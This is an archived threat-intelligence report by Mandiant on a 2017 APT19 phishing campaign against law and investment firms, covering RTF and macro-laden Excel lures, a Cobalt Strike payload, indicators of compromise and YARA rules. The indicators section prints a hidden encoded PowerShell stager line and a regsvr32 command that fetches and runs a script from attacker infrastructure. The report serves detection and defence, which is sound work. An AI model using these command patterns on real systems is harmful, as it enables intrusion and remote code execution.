{ "id": "a0e6f916-412e-44df-88d8-9e9c8cda2925", "created_at": "2026-04-06T00:11:00.600668Z", "updated_at": "2026-04-10T03:33:22.410459Z", "deleted_at": null, "sha1_hash": "6fc906897c5820e13db9717e4f62cbfd1dea8e75", "title": "Privileges and Credentials: Phished at the Request of Counsel | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2241826, "plain_text": "Privileges and Credentials: Phished at the Request of Counsel |\r\nMandiant\r\nBy Mandiant\r\nPublished: 2017-06-06 · Archived: 2026-04-05 12:50:31 UTC\r\nSummary\r\nIn May and June 2017, FireEye observed a phishing campaign targeting at least seven global law and investment\r\nfirms. We have associated this campaign with APT19, a group that we assess is composed of freelancers, with\r\nsome degree of sponsorship by the Chinese government.\r\nAPT19 used three different techniques to attempt to compromise targets. In early May, the phishing lures\r\nleveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE 2017-0199.\r\nToward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the\r\nmost recent versions, APT19 added an application whitelisting bypass to the XLSM documents. At least one\r\nobserved phishing lure delivered a Cobalt Strike payload.\r\nAs of the writing of this blog post, FireEye had not observed post-exploitation activity by the threat actors, so we\r\ncannot assess the goal of the campaign. We have previously observed APT19 steal data from law and investment\r\nfirms for competitive economic purposes.\r\nThis purpose of this blog post is to inform law firms and investment firms of this phishing campaign and provide\r\ntechnical indicators that their IT personnel can use for proactive hunting and detection.\r\nThe Emails\r\nAPT19 phishing emails from this campaign originated from sender email accounts from the \"@cloudsend[.]net\"\r\ndomain and used a variety of subjects and attachment names. Refer to the Indicators of Compromise section for\r\nmore details.\r\nThe Attachments\r\nAPT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their\r\ninitial exploits. The following sections describe the two methods in further detail.\r\nRTF Attachments\r\nThrough the exploitation of the HTA handler vulnerability described in CVE-2017-1099, the observed RTF\r\nattachments download hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. Unfortunately, this file was no longer\r\nhosted at tk-in-f156.2bunny[.]com for further analysis. Figure 1 is a screenshot of a packet capture showing one of\r\nthe RTF files reaching out to hxxp://tk-in-f156.2bunny[.]com/Agreement.doc.\r\nhttps://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel\r\nPage 1 of 14\n\nXLSM Attachments\r\nThe XLSM attachments contained multiple worksheets with content that reflected the attachment name. The\r\nattachments also contained an image that requested the user to “Enable Content”, which would enable macro\r\nsupport if it was disabled. Figure 2 provides a screenshot of one of the XLSM files\r\n(MD5:30f149479c02b741e897cdb9ecd22da7).\r\nOne of the malicious XLSM attachments that we observed contained a macro that:\r\n1. Determined the system architecture to select the correct path for PowerShell\r\n2. Launched a ZLIB compressed and Base64 encoded command with PowerShell. This is a typical technique\r\nused by Meterpreter stagers.\r\nFigure 3 depicts the macro embedded within the XLSM file (MD5: 38125a991efc6ab02f7134db0ebe21b6).\r\nhttps://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel\r\nPage 2 of 14\n\nFigure 4 contains the decoded output of the encoded text.\r\nhttps://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel\r\nPage 3 of 14\n\nFigure 4: Decoded ZLIB + Base64 payload\r\nThe shellcode invokes PowerShell to issue a HTTP GET request for a random four (4) character URI on the root\r\nof autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP headers since the PowerShell command is\r\nexecuted with mostly default parameters. Figure 5 depicts an HTTP GET request generated by the payload, with\r\nminimal HTTP headers.\r\nhttps://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel\r\nPage 4 of 14\n\nFigure 5: GET Request with minimal HTTP headers\r\nConverting the shellcode to ASCII and removing the non-printable characters provides a quick way to pull out\r\nnetwork-based indicators (NBI) from the shellcode. Figure 6 shows the extracted NBIs.\r\nFigure 6: Decoded shellcode\r\nFireEye also identified an alternate macro in some of the XLSM documents, displayed in Figure 7.\r\nFigure 7: Alternate macro\r\nhttps://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel\r\nPage 5 of 14\n\nThis macro uses Casey Smith’s “Squiblydoo” Application Whitelisting bypass technique to run the command in\r\nFigure 8.\r\nFigure 8: Application Whitelisting Bypass\r\nThe command in Figure 8 downloads and launches code within an SCT file. The SCT file in the payload (MD5:\r\n1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9.\r\nFigure 10 provides the decoded script. Notice the “$DoIt” string, which is usually indicative of a Cobalt Strike\r\npayload.\r\nhttps://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel\r\nPage 6 of 14\n\nFigure 10: Decoded SCT contents\r\nA quick conversion of the contents of the variable “$var_code” from Base64 to ASCII shows some familiar\r\nnetwork indicators, shown in Figure 11.\r\nhttps://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel\r\nPage 7 of 14\n\nFigure 11: $var_code to ASCII\r\nSecond Stage Payload\r\nOnce the XLSM launches its PowerShell command, it downloads a typical Cobalt Strike BEACON payload,\r\nconfigured with the following parameters:\r\nProcess Inject Targets:\r\n%windir%\\syswow64\\rundll32.exe\r\n%windir%\\sysnative\\rundll32.exe\r\nc2_user_agents\r\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts;\r\nIE0006_ver1;EN_GB)\r\nNamed Pipes\r\n\\\\%s\\pipe\\msagent_%x\r\nbeacon_interval\r\n60\r\nC2\r\nautodiscover.2bunny[.]com/submit.php\r\nautodiscover.2bunny[.]com/IE9CompatViewList.xml\r\nsfo02s01-in-f2.cloudsend[.]net/submit.php\r\nsfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml\r\nC2 Port\r\nTCP/80\r\nFigure 12 depicts an example of a BEACON C2 attempt from this payload.\r\nhttps://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel\r\nPage 8 of 14\n\nFigure 12: Cobalt Strike BEACON C2\r\nFireEye Product Detections\r\nThe following FireEye products currently detect and block the methods described above. Table 1 lists the current\r\ndetection and blocking capabilities by product.\r\nDetection Name Product Action Notes\r\nSUSPICIOUS POWERSHELL USAGE\r\n(METHODOLOGY)\r\nHX Detect\r\nXSLM Macro\r\nlaunch\r\nGen:Variant.Application.HackTool.CobaltStrike.1 HX Detect\r\nXSLM Macro\r\nlaunch\r\nMalware Object HX Detect\r\nBEACON written to\r\ndisk\r\nBackdoor.BEACON NX Block* BEACON Callback\r\nFE_Malformed_RTF EX/ETP/NX Block* RTF\r\nMalware.Binary.rtf EX/ETP/NX Block* RTF\r\nMalware.Binary EX/ETP/NX Block* RTF\r\nMalware.Binary.xlsx EX/ETP/NX Block* XSLM\r\nTable 1: Detection review\r\n*Appliances must be configured for block mode.\r\nRecommendations\r\nFireEye recommends organizations perform the following steps to mitigate the risk of this campaign:\r\n1. Microsoft Office users should apply the patch from Microsoft as soon as possible, if they have not already\r\ninstalled it.\r\n2. Search historic and future emails that match the included indicators of compromise.\r\n3. Review web proxy logs for connections to the included network based indicators of compromise.\r\n4. Block connections to the included fully qualified domain names.\r\n5. Review endpoints for the included host based indicators of compromise.\r\nIndicators of Compromise\r\nThe following section provides the IOCs for the variants of the phishing emails and malicious payloads that\r\nFireEye has observed during this campaign.\r\nhttps://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel\r\nPage 9 of 14\n\nEmail Senders\r\nPressReader \u003cinfodept@cloudsend[.]net\u003e \u003c/infodept@cloudsend[.]net\u003e\r\nAngela Suh \u003cangela.suh@cloudsend[.]net\u003e \u003c/angela.suh@cloudsend[.]net\u003e\r\nAshley Safronoff \u003cashley.safronoff@cloudsend[.]net\u003e \u003c/ashley.safronoff@cloudsend[.]net\u003e\r\nLindsey Hersh \u003clindsey.hersh@cloudsend[.]net\u003e \u003c/lindsey.hersh@cloudsend[.]net\u003e\r\nSarah Roberto sarah.roberto@cloudsend[.]net\r\nnoreply@cloudsend[.]net\r\nEmail Subject Lines\r\nMacron Denies Authenticity Of Leak, French Prosecutors Open Probe\r\nMacron Document Leaker Releases New Images, Promises More Information\r\nAre Emmanuel Macron's Tax Evasion Documents Real?\r\nTime Allocation\r\nVacancy Report\r\nchina paper table and graph\r\nresults with zeros – some ready not all finished\r\nMacron Leaks contain secret plans for the islamisation of France and Europe\r\nAttachment Names\r\nMacron_Authenticity.doc.rtf\r\nMacron_Information.doc.rtf\r\nUS and EU Trade with China and China CA.xlsm\r\nTables 4 5 7 Appendix with zeros.xlsm\r\nProject Codes - 05.30.17.xlsm\r\nWeekly Vacancy Status Report 5-30-15.xlsm\r\nMacron_Tax_Evasion.doc.rtf\r\nMacron_secret_plans.doc.rtf\r\nNetwork Based Indicators (NBI)\r\nlyncdiscover.2bunny[.]com\r\nautodiscover.2bunny[.]com\r\nlyncdiscover.2bunny[.]com:443/Autodiscover/AutodiscoverService/\r\nlyncdiscover.2bunny[.]com/Autodiscover\r\nautodiscover.2bunny[.]com/K5om\r\nsfo02s01-in-f2.cloudsend[.]net/submit.php\r\nsfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml\r\ntk-in-f156.2bunny[.]com\r\ntk-in-f156.2bunny[.]com/Agreement.doc\r\n104.236.77[.]169\r\n138.68.45[.]9\r\nhttps://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel\r\nPage 10 of 14\n\n162.243.143[.]145\r\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts;\r\nIE0006_ver1;EN_GB)\r\ntf-in-f167.2bunny[.]com:443 (*Only seen in VT not ITW)\r\nHost Based Indicators (HBI)\r\nRTF MD5 hash values\r\n0bef39d0e10b1edfe77617f494d733a8\r\n0e6da59f10e1c4685bb5b35a30fc8fb6\r\ncebd0e9e05749665d893e78c452607e2\r\nXLSX MD5 hash values\r\n38125a991efc6ab02f7134db0ebe21b6\r\n3a1dca21bfe72368f2dd46eb4d9b48c4\r\n30f149479c02b741e897cdb9ecd22da7\r\nBEACON and Meterpreter payload MD5 hash values\r\nbae0b39197a1ac9e24bdf9a9483b18ea\r\n1151619d06a461456b310096db6bc548\r\nProcess arguments, named pipes, and file paths\r\npowershell.exe -NoP -NonI -W Hidden -Command \"Invoke-Expression $(New-Object IO.StreamReader\r\n($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream\r\n(,$([Convert]::FromBase64String(\"\")\r\nregsvr32.exe /s /n /u /i:hxxps://lyncdiscover.2bunny.com/Autodiscover scrobj.dll\r\n\\\\\\pipe\\msagent_\u003c4 digits\u003e\r\nC:\\Documents and Settings\\\\Local Settings\\Temp\\K5om.dll (4 character DLL based on URI of original\r\nGET request)\r\nYara Rules\r\nrule FE_LEGALSTRIKE_MACRO {\r\n meta:version=\".1\"\r\n filetype=\"MACRO\"\r\n author=\"Ian.Ahl@fireeye.com @TekDefense\"\r\n date=\"2017-06-02\"\r\n description=\"This rule is designed to identify macros with the specific encoding used in the sample 30f14\r\nstrings:\r\n // OBSFUCATION\r\n $ob1 = \"ChrW(114) \u0026 ChrW(101) \u0026 ChrW(103) \u0026 ChrW(115) \u0026 ChrW(118) \u0026 ChrW(114) \u0026 ChrW(51) \u0026 ChrW(50) \u0026 Chr\r\n $ob2 = \"ChrW(120) \u0026 ChrW(101) \u0026 ChrW(32) \u0026 ChrW(47) \u0026 ChrW(115) \u0026 ChrW(32) \u0026 ChrW(47) \u0026 ChrW(110) \u0026 ChrW(\r\nhttps://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel\r\nPage 11 of 14\n\n$ob3 = \"ChrW(117) \u0026 ChrW(32) \u0026 ChrW(47) \u0026 ChrW(105) \u0026 ChrW(58) \u0026 ChrW(104) \u0026 ChrW(116) \u0026 ChrW(116) \u0026 ChrW\r\n $ob4 = \"ChrW(58) \u0026 ChrW(47) \u0026 ChrW(47) \u0026 ChrW(108) \u0026 ChrW(121) \u0026 ChrW(110) \u0026 ChrW(99) \u0026 ChrW(100) \u0026 ChrW(\r\n $ob5 = \"ChrW(99) \u0026 ChrW(111) \u0026 ChrW(118) \u0026 ChrW(101) \u0026 ChrW(114) \u0026 ChrW(46) \u0026 ChrW(50) \u0026 ChrW(98) \u0026 ChrW(\r\n $ob6 = \"ChrW(110) \u0026 ChrW(121) \u0026 ChrW(46) \u0026 ChrW(99) \u0026 ChrW(111) \u0026 ChrW(109) \u0026 ChrW(47) \u0026 ChrW(65) \u0026 ChrW(\r\n $ob7 = \"ChrW(111) \u0026 ChrW(100) \u0026 ChrW(105) \u0026 ChrW(115) \u0026 ChrW(99) \u0026 ChrW(111) \u0026 ChrW(118) \u0026 ChrW(101) \u0026 Ch\r\n $ob8 = \"ChrW(115) \u0026 ChrW(99) \u0026 ChrW(114) \u0026 ChrW(111) \u0026 ChrW(98) \u0026 ChrW(106) \u0026 ChrW(46) \u0026 ChrW(100) \u0026 ChrW\r\n $obreg1 = /(\\w{5}\\s\u0026\\s){7}\\w{5}/\r\n $obreg2 = /(Chrw\\(\\d{1,3}\\)\\s\u0026\\s){7}/\r\n // wscript\r\n $wsobj1 = \"Set Obj = CreateObject(\\\"WScript.Shell\\\")\" ascii wide\r\n $wsobj2 = \"Obj.Run \" ascii wide\r\ncondition:\r\n (\r\n (\r\n (uint16(0) != 0x5A4D)\r\n )\r\n and\r\n (\r\n all of ($wsobj*) and 3 of ($ob*)\r\n or\r\n all of ($wsobj*) and all of ($obreg*)\r\n )\r\n )\r\n}\r\nrule FE_LEGALSTRIKE_MACRO_2 {\r\n meta:version=\".1\"\r\n filetype=\"MACRO\"\r\n author=\"Ian.Ahl@fireeye.com @TekDefense\"\r\n date=\"2017-06-02\"\r\n description=\"This rule was written to hit on specific variables and powershell command fragments as seen\r\nstrings:\r\n // Setting the environment\r\n $env1 = \"Arch = Environ(\\\"PROCESSOR_ARCHITECTURE\\\")\" ascii wide\r\n $env2 = \"windir = Environ(\\\"windir\\\")\" ascii wide\r\n $env3 = \"windir + \\\"\\\\syswow64\\\\windowspowershell\\\\v1.0\\\\powershell.exe\\\"\" ascii wide\r\n // powershell command fragments\r\n $ps1 = \"-NoP\" ascii wide\r\n $ps2 = \"-NonI\" ascii wide\r\n $ps3 = \"-W Hidden\" ascii wide\r\n $ps4 = \"-Command\" ascii wide\r\n $ps5 = \"New-Object IO.StreamReader\" ascii wide\r\n $ps6 = \"IO.Compression.DeflateStream\" ascii wide\r\n $ps7 = \"IO.MemoryStream\" ascii wide\r\n $ps8 = \",$([Convert]::FromBase64String\" ascii wide\r\nhttps://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel\r\nPage 12 of 14\n\n$ps9 = \"ReadToEnd();\" ascii wide\r\n $psregex1 = /\\W\\w+\\s+\\s\\\".+\\\"/\r\ncondition:\r\n (\r\n (\r\n (uint16(0) != 0x5A4D)\r\n )\r\n and\r\n (\r\n all of ($env*) and 6 of ($ps*)\r\n or\r\n all of ($env*) and 4 of ($ps*) and all of ($psregex*)\r\n )\r\n )\r\n}\r\nrule FE_LEGALSTRIKE_RTF {\r\n meta:\r\n version=\".1\"\r\n filetype=\"MACRO\"\r\n author=\"joshua.kim@FireEye.com\"\r\n date=\"2017-06-02\"\r\n description=\"Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDO\r\n strings:\r\n $header = \"{\\\\rt\"\r\n $lnkinfo = \"4c0069006e006b0049006e0066006f\"\r\n $encoded1 = \"4f4c45324c696e6b\"\r\n $encoded2 = \"52006f006f007400200045006e007400720079\"\r\n $encoded3 = \"4f0062006a0049006e0066006f\"\r\n $encoded4 = \"4f006c0065\"\r\n $http1 = \"68{\"\r\n $http2 = \"74{\"\r\n $http3 = \"07{\"\r\n // 2bunny.com\r\n $domain1 = \"32{\\\\\"\r\n $domain2 = \"62{\\\\\"\r\n $domain3 = \"75{\\\\\"\r\n $domain4 = \"6e{\\\\\"\r\n $domain5 = \"79{\\\\\"\r\n $domain6 = \"2e{\\\\\"\r\n $domain7 = \"63{\\\\\"\r\n $domain8 = \"6f{\\\\\"\r\n $domain9 = \"6d{\\\\\"\r\n $datastore = \"\\\\*\\\\datastore\"\r\n condition:\r\nhttps://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel\r\nPage 13 of 14\n\n$header at 0 and all of them\r\n}\r\nAcknowledgements\r\nJoshua Kim, Nick Carr, Gerry Stellatos, Charles Carmakal, TJ Dahms, Nick Richard, Barry Vengerik, Justin\r\nProsco, Christopher Glyer\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel\r\nhttps://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel" ], "report_names": [ "phished-at-the-request-of-counsel" ], "threat_actors": [ { "id": "1f3cf3d1-4764-4158-a216-dd6352e671bb", "created_at": "2022-10-25T15:50:23.837615Z", "updated_at": "2026-04-10T02:00:05.322197Z", "deleted_at": null, "main_name": "APT19", "aliases": [ "APT19", "Codoso", "C0d0so0", "Codoso Team", "Sunshop Group" ], "source_name": "MITRE:APT19", "tools": [ "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "46a151bd-e4c2-46f9-aee9-ee6942b01098", "created_at": "2023-01-06T13:46:38.288168Z", "updated_at": "2026-04-10T02:00:02.911919Z", "deleted_at": null, "main_name": "APT19", "aliases": [ "DEEP PANDA", "Codoso", "KungFu Kittens", "Group 13", "G0009", "G0073", "Checkered Typhoon", "Black Vine", "TEMP.Avengers", "PinkPanther", "Shell Crew", "BRONZE FIRESTONE", "Sunshop Group" ], "source_name": "MISPGALAXY:APT19", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f2ce5b52-a220-4b94-ab66-4b81f3fed05d", "created_at": "2025-08-07T02:03:24.595597Z", "updated_at": "2026-04-10T02:00:03.740023Z", "deleted_at": null, "main_name": "BRONZE FIRESTONE", "aliases": [ "APT19 ", "C0d0s0", "Checkered Typhoon ", "Chlorine ", "Deep Panda ", "Pupa ", "TG-3551 " ], "source_name": "Secureworks:BRONZE FIRESTONE", "tools": [ "9002", "Alice's Rabbit Hole", "Cobalt Strike", "Derusbi", "PlugX", "PoisonIvy", "PowerShell Empire", "Trojan Briba", "Zuguo" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434260, "ts_updated_at": 1775792002, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6fc906897c5820e13db9717e4f62cbfd1dea8e75.pdf", "text": "https://archive.orkl.eu/6fc906897c5820e13db9717e4f62cbfd1dea8e75.txt", "img": "https://archive.orkl.eu/6fc906897c5820e13db9717e4f62cbfd1dea8e75.jpg" } }